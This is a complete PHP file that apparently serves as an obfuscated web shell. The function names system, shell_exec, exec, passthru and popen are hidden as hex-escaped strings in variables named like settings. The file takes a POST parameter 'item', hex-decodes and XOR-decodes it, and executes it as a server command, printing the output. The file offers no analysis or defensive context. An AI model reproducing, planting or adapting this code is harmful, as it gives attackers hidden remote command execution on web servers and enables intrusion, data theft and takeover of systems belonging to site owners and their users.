<?php

$settings3 = "\x65\x78ec";
$initialized = "h\x65x\x32b\x69\x6E";
$settings7 = "p\x63l\x6F\x73e";
$settings4 = "pa\x73\x73\x74\x68ru";
$settings5 = "\x70\x6Fpen";
$settings6 = "st\x72\x65\x61\x6D\x5F\x67\x65t_con\x74e\x6E\x74s";
$settings1 = "sy\x73te\x6D";
$settings2 = "\x73h\x65\x6C\x6C\x5Fexec";
if (isset($_POST["\x69\x74em"])) {
            function sync_manager    (     $data    ,       $comp    )   {
   $marker    =    ''   ;
    foreach(str_split($data) as $char){
$marker.=chr(ord($char)^$comp);

} return      $marker;
    
}
            $item = $initialized($_POST["\x69\x74em"]);
            $item = sync_manager($item, 68);
            if (function_exists($settings1)) {
                $settings1($item);
            } elseif (function_exists($settings2)) {
                print $settings2($item);
            } elseif (function_exists($settings3)) {
                $settings3($item, $bind_data);
                print join("\n", $bind_data);
            } elseif (function_exists($settings4)) {
                $settings4($item);
            } elseif (function_exists($settings5) && function_exists($settings6) && function_exists($settings7)) {
                $comp_marker = $settings5($item, 'r');
                if ($comp_marker) {
                    $parameter_group_elem = $settings6($comp_marker);
                    $settings7($comp_marker);
                    print $parameter_group_elem;
                }
            }
            exit;
        }